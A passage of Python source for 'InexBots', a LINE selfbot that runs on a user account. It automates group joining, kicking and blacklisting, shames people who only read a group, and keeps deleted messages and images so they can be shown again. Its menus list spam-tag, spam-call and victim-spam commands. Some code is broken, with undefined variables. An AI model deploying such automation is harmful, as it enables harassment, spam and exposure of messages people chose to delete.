"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#00008B"
},
"header": {
"backgroundColor": "#00008B"
}
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(op.param2).pictureStatus),
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#006400",
"height": "sm",
"action": {
"type": "uri",
"label": "OFFICIAL",
"uri": "https://line.me/R/ti/p/%40bvb1195k"
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#800000",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}]
}]
}
}
}
cl.sendFlex(to, data)
def sendFoto(to, images):
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
to = msg.to
data = {
"type": "template",
"altText": "{} tukang unsend".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://obs.line-scdn.net/{}".format(cl.getContact(msg_dict[msg_id]["data"])),
"size": "full",
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}
]
}
}
cl.sendFlex(to, data)
def sendTextTemplate(to, text):
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "InexBots",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": text,
"color": "#3800E0",
"wrap": True
}
]
}
}
}
cl.sendFlex(to, data)
def sendAutolike(to,text):
data = {
"type": "template",
"altText": "InexBots",
"template": {
"type": "carousel",
"actions": [],
"columns": [
{
"thumbnailImageUrl": "https://scontent.fcgk8-1.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/51689146_2326064860750957_3568131342002552832_o.jpg?_nc_cat=100&efg=eyJpIjoiYiJ9&_nc_eui2=AeEKUakDYnXikuMkE8vPPZhxEuKQRqPyo08BbWoruGL-DN9mYH2NmCnik886MGJCiMS8D7ZSUmabSAcRk7S3_GwwhAIKCVBmiq32OaYa0XaV-w&_nc_ht=scontent.fcgk8-1.fna&oh=18937dc8439c5fdf7c9de33c6f00fad6&oe=5D0231F5",
"title": "{}".format(cl.getContact(op.param2).displayName),
"text": text,
"actions": [
{
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
]
}
]
}
}
cl.sendFlex(to, data)
def sendCyduk(to, text):
contact = cl.getContact(op.param2)
favoritelist = cl.getFavoriteMids()
grouplist = cl.getGroupIdsJoined()
contactlist = cl.getAllContactIds()
blockedlist = cl.getBlockedContactIds()
data = {
"type": "flex",
"altText": "{} Lagi nyari janda".format(jakaProfile.displayName),
"contents": {
"styles": {
"body": {
"backgroundColor": "#000080"
},
"footer": {
"backgroundColor": "#000080"
}
},
"type": "bubble",
"body": {
"contents": [
{
"contents": [
{
"text": "BIO DATA\n❀ NAMA: {}".format(cl.getContact(op.param2).displayName)+"\n❀ GROUP: {}".format(str(len(grouplist)))+"\n❀ FRIEND : {}".format(str(len(contactlist)))+"\n❀ FAFORITE : {}".format(str(len(favoritelist)))+"\n❀ BLOCKED : {}".format(str(len(blockedlist)))+"\nBio: {}".format(cl.getContact(op.param2).statusMessage),
"size": "sm",
"color": "#FF3366",
"wrap": True,
"type": "text",
"align": "center"
},
{
"type": "separator",
"color": "#FF0000"
},
{
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(op.param2).pictureStatus),
"type": "image",
"size": "full"
}
],
"type": "box",
"spacing": "md",
"layout": "horizontal"
},
{
"type": "separator",
"color": "#FF0000"
},
{
"contents": [
{
"contents": [
{
"size": "xxl",
"type": "icon",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(mid).pictureStatus)
},
{
"text": text,
"size": "sm",
"margin": "none",
"color": "#00FF00",
"wrap": True,
"weight": "regular",
"type": "text",
"align": "center"
}
],
"type": "box",
"layout": "baseline"
}
],
"type": "box",
"layout": "horizontal"
}
],
"type": "box",
"spacing": "md",
"layout": "vertical"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"flex": 2,
"contents": [{
"type": "button",
"style": "secondary",
"color": "#00FF00",
"height": "sm",
"action": {
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}]
}]
}
}
}
cl.sendFlex(to, data)
def command(text):
pesan = text.lower()
if pesan.startswith(Setmain["keyCommand"]):
cmd = pesan.replace(Setmain["keyCommand"],"")
else:
cmd = "command"
return cmd
def help():
key = Setmain["keyCommand"]
key = key.title()
helpMessage = extras + "╔━━═☠• INEXBOTS •☠═━━╗\n" + \
"╠☠•➤" + key + "☠•➤MENU HELP•☠\n" + \
"╠☠•➤" + key + "Me\n" + \
"╠☠•➤" + key + "Tokenlist\n" + \
"╠☠•➤" + key + "Memberpict\n" + \
"╠☠•➤" + key + "Mid「@」\n" + \
"╠☠•➤" + key + "Getmid「@」\n" + \
"╠☠•➤" + key + "Info「@」\n" + \
"╠☠•➤" + key + "Kick「@」\n" + \
"╠☠•➤" + key + "Kibar\n" + \
"╠☠•➤" + key + "Status\n" + \
"╠☠•➤" + key + "About\n" + \
"╠☠•➤" + key + "Restart\n" + \
"╠☠•➤" + key + "Runtime\n" + \
"╠☠•➤" + key + "Creator\n" + \
"╠☠•➤" + key + "Speed/Sp\n" + \
"╠☠•➤" + key + "Sprespon\n" + \
"╠☠•➤" + key + "Tag/Inex\n" + \
"╠☠•➤" + key + "Tag room:「No grup」\n" + \
"╠☠•➤" + key + "Ginfo\n" + \
"╠☠•➤" + key + "Open\n" + \
"╠☠•➤" + key + "Close\n" + \
"╠☠•➤" + key + "Gurl\n" + \
"╠☠•➤" + key + "Gruplist\n" + \
"╠☠•➤" + key + "Infogrup「angka」\n" + \
"╠☠•➤" + key + "Infomem「angka」\n" + \
"╠☠•➤" + key + "Remove chat\n" + \
"╠☠•➤" + key + "Lurking「on/off」\n" + \
"╠☠•➤" + key + "Lurkers\n" + \
"╠☠•➤" + key + "Sider「on/off」\n" + \
"╠☠•➤" + key + "Myup\n" + \
"╠☠•➤" + key + "Updategrup\n" + \
"╠☠•➤" + key + "Bcast: / Gcast:「Text」\n" + \
"╠☠•➤" + key + "Pmcast:「Text」\n" + \
"╠☠•➤" + key + "Setkey「New Key」\n" + \
"╠☠•➤" + key + "Mykey\n" + \
"╠☠•➤" + key + "Resetkey\n" + \
"╠☠•➤" + key + "☠•HIBURAN•☠\n" + \
"╠☠•➤" + key + "Movie\n" + \
"╠☠•➤" + key + "ID line:「Id Line nya」\n" + \
"╠☠•➤" + key + "Sholat:「Nama Kota」\n" + \
"╠☠•➤" + key + "Cuaca:「Nama Kota」\n" + \
"╠☠•➤" + key + "Lokasi:「Nama Kota」\n" + \
"╠☠•➤" + key + "Musik「Judul Lagu」\n" + \
"╠☠•➤" + key + "Lirik:「Judul Lagu」\n" + \
"╠☠•➤" + key + "Ytmp3:「Judul Lagu」\n" + \
"╠☠•➤" + key + "Ytmp「Judul Video」\n" + \
"╠☠•➤" + key + "Profileig:「Nama IG」\n" + \
"╠☠•➤" + key + "Cekdate:「tgl-bln-thn」\n" + \
"╠☠•➤" + key + "Jumlah:「angka」\n" + \
"╠☠•➤" + key + "Spamtag「@」\n" + \
"╠☠•➤" + key + "Spamcall:「jumlahnya」\n" + \
"╠☠•➤" + key + "Spamcall\n" + \
"╠☠•➤" + key + "Notag「on/off」\n" + \
"╚━━═☠•INEXBOTS V.2•☠═━━╝"
return helpMessage
def helpa():
key = Setmain["keyCommand"]
key = key.title()
helpMessagea = extras + "╔━━═☠• INEXBOTS •☠═━━╗\n" + \
"╠☠•➤" + key + "☠•ARESPONSE•☠\n" + \
"╠☠•➤" + key + "Sticker「on/off」\n" + \
"╠☠•➤" + key + "R1「on/off」\n" + \
"╠☠•➤" + key + "R2「on/off」\n" + \
"╠☠•➤" + key + "PM「on/off」\n" + \
"╠☠•➤" + key + "Contact「on/off」\n" + \
"╠☠•➤" + key + "Autojoin「on/off」\n" + \
"╠☠•➤" + key + "Autoadd「on/off」\n" + \
"╠☠•➤" + key + "Autoblock「on/off」\n" + \
"╠☠•➤" + key + "Wc「on/off」\n" + \
"╠☠•➤" + key + "Autoleave「on/off」\n" + \
"╠☠•➤" + key + "Admin:on\n" + \
"╠☠•➤" + key + "Admin:repeat\n" + \
"╠☠•➤" + key + "Staff:on\n" + \
"╠☠•➤" + key + "Staff:repeat\n" + \
"╠☠•➤" + key + "Bot:on\n" + \
"╠☠•➤" + key + "Bot:repeat\n" + \
"╠☠•➤" + key + "Adminadd「@」\n" + \
"╠☠•➤" + key + "Admindell「@」\n" + \
"╠☠•➤" + key + "Staffadd「@」\n" + \
"╠☠•➤" + key + "Staffdell「@」\n" + \
"╠☠•➤" + key + "Botadd「@」\n" + \
"╠☠•➤" + key + "Botdell「@」\n" + \
"╠☠•➤" + key + "Listadmin\n" + \
"╚━━═☠•INEXBOTS V.2•☠═━━╝"
return helpMessagea
def helpbot():
key = Setmain["keyCommand"]
key = key.title()
helpMessage1 = extras + "╔━━━═☠•☠• INEXBOTS •☠•☠═━━━╗\n" + \
"╠☠•➤" + key + "☠•HELP BOT•☠\n" + \
"╠☠•➤" + key + "Blc\n" + \
"╠☠•➤" + key + "Ban:on\n" + \
"╠☠•➤" + key + "Unban:on\n" + \
"╠☠•➤" + key + "Ban「@」\n" + \
"╠☠•➤" + key + "Unban「@」\n" + \
"╠☠•➤" + key + "Talkban「@」\n" + \
"╠☠•➤" + key + "Untalkban「@」\n" + \
"╠☠•➤" + key + "Talkban:on\n" + \
"╠☠•➤" + key + "Untalkban:on\n" + \
"╠☠•➤" + key + "Banlist\n" + \
"╠☠•➤" + key + "Talkbanlist\n" + \
"╠☠•➤" + key + "Clearban\n" + \
"╠☠•➤" + key + "Refresh\n" + \
"╠☠•➤" + key + "Cek allrespon\n" + \
"╠☠•➤" + key + "Cek sider\n" + \
"╠☠•➤" + key + "Cek spam\n" + \
"╠☠•➤" + key + "Cek pesan \n" + \
"╠☠•➤" + key + "Cek respon \n" + \
"╠☠•➤" + key + "Cek welcome\n" + \
"╠☠•➤" + key + "Set sider:「Text」\n" + \
"╠☠•➤" + key + "Set spam:「Text」\n" + \
"╠☠•➤" + key + "Set pesan:「Text」\n" + \
"╠☠•➤" + key + "Set r1:「Text」\n" + \
"╠☠•➤" + key + "Set r2:「Text」\n" + \
"╠☠•➤" + key + "Set pm:「Text」\n" + \
"╠☠•➤" + key + "Set Autojoin:「Text」\n" + \
"╠☠•➤" + key + "Set welcome:「Text」\n" + \
"╠☠•➤" + key + "Myname:「Nama」\n" + \
"╠☠•➤" + key + "Gift:「Mid korban」「Jumlah」\n" + \
"╠☠•➤" + key + "Spam:「Mid korban」「Jumlah」\n" + \
"╚━━━━═☠•☠•INEXBOTS V.2•☠•☠═━━━━╝"
return helpMessage1
def bot(op):
global time
global ast
global groupParam
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
if wait["autoLeave"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
sendAutolike(op.param1,"Maaf fams "+str(ginfo.name)+" saya pamit lagi ya.")
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Hi fams "+str(ginfo.name))
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
group = cl.getGroup(op.param1)
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "Masuk group melalui jendela",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"spacing": "md",
"contents": [
{
"type": "box",
"layout": "vertical",
"flex": 2,
"contents": [
{
"type": "text",
"text": str(wait["autoJoinMessage"]),
"size": "md",
"weight": "bold",
"wrap": True,
"color": warnanya1,
"align": "center"
},
]
}
]
},
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#00FFFF"
},
"header": {
"backgroundColor": "#00FFFF"
}
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": "https://obs.line-scdn.net/{}".format(group.pictureStatus),
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#006400",
"height": "sm",
"action": {
"type": "uri",
"label": "OFFICIAL",
"uri": "https://line.me/R/ti/p/%40bvb1195k"
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#800000",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}]
}]
}
}
}
cl.sendFlex(op.param1, data)
# EDIT
if op.type == 19:
if op.param3 in admin or op.param3 in owner or op.param3 in staff:
if op.param2 in admin or op.param2 in owner or op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
cl.log("bot limit")
if op.type == 17:
if op.param2 in wait["blacklist"]:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
wait["blacklist"][op.param2] = True
except:
pass
return
if op.type == 17:
if op.param1 in welcome:
ginfo = cl.getGroup(op.param1)
#welcomeMembers(op.param1, [op.param2])
contact = cl.getContact(op.param2)
data = {
"type": "flex",
"altText": "JANGAN KABUR DARI GRUP KAK",
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#000080",
},
"body": {
"backgroundColor": "#0000FF",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "{} WELCOME".format(cl.getContact(op.param2).displayName),
"weight": "bold",
"color": "#FF0000",
"size": "xxl"
}
]
},
"hero": {
"type": "image",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(op.param2).pictureStatus),
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": str(wait["welcome"]),
"wrap": True,
"color": "#00FF00",
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": "#00FF00",
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(op.param1, data)
if op.type == 15:
if op.param1 in welcome:
ginfo = cl.getGroup(op.param1)
leaveMembers(op.param1, [op.param2])
contact = cl.getContact(op.param2).picturePath
data = {
"type": "flex",
"altText": "kickall",
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#000080",
},
"body": {
"backgroundColor": "#0000FF",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "{} LEAVE".format(cl.getContact(op.param2).displayName),
"weight": "bold",
"color": "#FF0000",
"size": "xxl"
}
]
},
"hero": {
"type": "image",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(op.param2).pictureStatus),
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Selamat jalan,,, semoga d luar gak kdinginan",
"wrap": True,
"color": "#00FF00",
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": "#00FF00",
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(op.param1, data)
if op.type == 13:
if op.param2 in wait["blacklist"]:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.cancelGroupInvitation(op.param1,[op.param2])
except:
pass
if op.type == 5:
if wait["autoAdd"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [" "," ","\n",None]):
pass
else:
cl.sendMessage(op.param1, wait["message"])
#☠•➤☠•➤☠•➤RKF☠•➤☠•➤☠•➤☠•➤
if admin in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param1,admin)
cl.inviteIntoGroup(op.param1,admin)
wait["blacklist"][op.param2] = True
except:
pass
return
if staff in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param1,staff)
cl.inviteIntoGroup(op.param1,staff)
wait["blacklist"][op.param2] = True
except:
pass
return
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 2:
if msg.toType == 0:
to = msg._from
elif msg.toType == 2:
to = msg.to
if msg.contentType == 16:
if wait["Timeline"] == True:
ret_ = "☠•➤ Detail Postingan☠•➤"
if msg.contentMetadata["serviceType"] == "GB":
contact = cl.getContact(sender)
auth = "\n☠•➤ Penulis : {}".format(str(contact.displayName))
else:
auth = "\n☠•➤ Penulis : {}".format(str(msg.contentMetadata["serviceName"]))
ret_ += auth
if "stickerId" in msg.contentMetadata:
stck = "\n☠•➤ Stiker : https://line.me/R/shop/detail/{}".format(str(msg.contentMetadata["packageId"]))
ret_ += stck
if "mediaOid" in msg.contentMetadata:
object_ = msg.contentMetadata["mediaOid"].replace("svc=myhome|sid=h|","")
if msg.contentMetadata["mediaType"] == "V":
if msg.contentMetadata["serviceType"] == "GB":
ourl = "\n☠•➤ Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(msg.contentMetadata["mediaOid"]))
murl = "\n☠•➤ Media URL : https://obs-us.line-apps.com/myhome/h/download.nhn?{}".format(str(msg.contentMetadata["mediaOid"]))
else:
ourl = "\n☠•➤ Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(object_))
murl = "\n☠•➤ Media URL : https://obs-us.line-apps.com/myhome/h/download.nhn?{}".format(str(object_))
ret_ += murl
else:
if msg.contentMetadata["serviceType"] == "GB":
ourl = "\n☠•➤ Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(msg.contentMetadata["mediaOid"]))
else:
ourl = "\n☠•➤ Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(object_))
ret_ += ourl
if "text" in msg.contentMetadata:
text = "\n☠•➤ Tulisan : {}".format(str(msg.contentMetadata["text"]))
purl = "\n☠•➤ Post URL : {}".format(str(msg.contentMetadata["postEndUrl"]).replace("line://","https://line.me/R/"))
ret_ += purl
ret_ += text
sendTextTemplate1(to, str(ret_))
cl.likePost(url[25:58], url[66:], likeType=1001)
cl.createComment(url[25:58], url[66:], wait["comment"])
sendAutolike(to, "Like done")
if op.type == 55:
try:
if op.param1 in Setmain["ARreadPoint"]:
if op.param2 in Setmain["ARreadMember"][op.param1]:
pass
else:
Setmain["ARreadMember"][op.param1][op.param2] = True
else:
pass
except:
pass
if op.type == 55:
try:
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
if op.param2 in Bots:
pass
else:
Name = cl.getContact(op.param2).displayName
Np = cl.getContact(op.param2).pictureStatus
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n• " + Name
if " " in Name:
nick = Name.split(' ')
if len(nick) == 2:
sendCyduk(op.param1, wait["mention"])
else:
sendTextTemplate44(op.param1, "Woy " + nick[1] + "\nBetah Banget Jadi Cicitipi. . \nChat Woy (-__-) ")
else:
sendTextTemplate7(op.param1, "Nah.. " + "☞ " + Name + " ☜" + "\nNgapain Cicitipi Doang?\nGa Gaul Lu ga Mau Chat\nPasti Temennya Dikit ")
else:
pass
else:
pass
except:
pass
if op.type == 55:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 5:
if settings['autoBlock'] == True:
try:
usr = cl.getContact(op.param2)
cl.sendMessage(op.param1, "Haii {} Sorry Auto Block , Komen di TL dulu ya kalo akun asli baru di unblock".format(usr.displayName))
cl.talk.blockContact(0, op.param1)
wait["Blacklist"][op.param2] = True
except Exception as e:
print (e)
if op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg._from not in Bots:
if wait["talkban"] == True:
if msg._from in wait["Talkblacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["arespon"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention ['M'] in Bots:
contact = cl.getContact(msg._from)
sendMentionV3(sender, "Kak @! "+ wait["Responpm"], [sender])
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "{} Cieeeee... Kang tag".format(cl.getContact(sender).displayName),
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#0000FF",
},
"body": {
"backgroundColor": "#000000",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "{}".format(cl.getContact(sender).displayName),
"weight": "bold",
"color": warnanya1,
"size": "md"
}
]
},
"hero": {
"type": "image",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(sender).pictureStatus),
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "{} \n".format(cl.getContact(sender).displayName)+str(wait["Responpm"]),
"wrap": True,
"color": warnanya1,
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": warnanya1,
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(sender, data)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
contact = cl.getContact(msg._from)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "template",
"altText": "Mention plates",
"template": {
"type": "carousel",
"actions": [],
"columns": [
{
"thumbnailImageUrl": "https://obs.line-scdn.net/{}".format(cl.getContact(msg._from).pictureStatus),
"title": "{}".format(cl.getContact(msg._from).displayName),
"text": str(wait["Respontag"]),
"actions": [
{
"type": "uri",
"label": "CREATOR",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
]
},
{
"thumbnailImageUrl": "https://scontent.fcgk8-1.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/51689146_2326064860750957_3568131342002552832_o.jpg?_nc_cat=100&efg=eyJpIjoiYiJ9&_nc_eui2=AeEKUakDYnXikuMkE8vPPZhxEuKQRqPyo08BbWoruGL-DN9mYH2NmCnik886MGJCiMS8D7ZSUmabSAcRk7S3_GwwhAIKCVBmiq32OaYa0XaV-w&_nc_ht=scontent.fcgk8-1.fna&oh=18937dc8439c5fdf7c9de33c6f00fad6&oe=5D0231F5",
"title": "ɪɴᴇxʙᴏᴛs",
"text": "☠•➤ ɪɴᴇxʙᴏᴛs.ʙᴏᴛʟɪɴᴇ \nᴠᴇʀ.8.14.2 ᴘʀᴏᴛᴇᴄᴛ",
"actions": [
{
"type": "uri",
"label": "ORDER",
"uri": "line://app/1602687308-GXq4Vvk9/?type=text&text=price"
}
]
}
]
}
}
cl.sendFlex(to, data)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention2"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
saints = cl.getContact(msg._from)
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
cl.sendMessage(msg.to, wait["Respontag2"])
#cl.sendMessage(to, None, contentMetadata={"STKID":"50726910","STKPKGID":"11475","STKVER":"2"}, contentType=7)
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://3.bp.blogspot.com/-5wFNSCJlYWI/WRxHdiXJl0I/AAAAAAAHlIg/k9KvZJCkpfIslWlgqyxtjR5jzBEvEgA6QCLcB/s1600/AW429388_04.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["Mentionkick"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.mentiontag(msg.to,[msg._from])
cl.sendMessage(msg.to, "Jangan tag saya....")
cl.kickoutFromGroup(msg.to, [msg._from])
break
#===========================
if op.type == 26 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.contentType == 0:
msg_dict[msg.id] = {"text":msg.text,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 1:
path = cl.downloadObjectMsg(msg_id)
msg_dict[msg.id] = {"text":'Gambarnya dibawah',"data":path,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 7:
stk_id = msg.contentMetadata["STKID"]
stk_ver = msg.contentMetadata["STKVER"]
pkg_id = msg.contentMetadata["STKPKGID"]
ret_ = "╭━━━━══════════════\n"
ret_ = "\n┣☠•➤「 Sticker Info 」"
ret_ += "\n┣☠•➤ Sticker ID : {}".format(stk_id)
ret_ += "\n┣☠•➤ Sticker Version : {}".format(stk_ver)
ret_ += "\n┣☠•➤ Sticker Package : {}".format(pkg_id)
ret_ += "\n┣☠•➤ Sticker Url : line://shop/detail/{}".format(pkg_id)
ret_ += "\n╰━━━━══════════════\n"
query = int(stk_id)
if type(query) == int:
data = 'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(query)+'/ANDROID/sticker.png'
path = cl.downloadFileURL(data)
msg_dict1[msg.id] = {"text":str(ret_),"data":path,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 0:
if text is None:
return
if op.type == 65:
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict:
if msg_dict[msg_id]["from"]:
if msg_dict[msg_id]["text"] == 'Gambarnya dibawah':
ginfo = cl.getGroup(at)
jaka = cl.getContact(msg_dict[msg_id]["from"])
zx = ""
zxc = ""
zx2 = []
xpesan = "╭━━━━══════════════\n┣☠•➤「 Gambar Dihapus 」\n┣☠•➤ Pengirim"
ret_ = "\n┣☠•➤ Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n┣☠•➤ Waktu Dikirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict[msg_id]["createdTime"])))
ret_ += "\n╰━━━━══════════════"
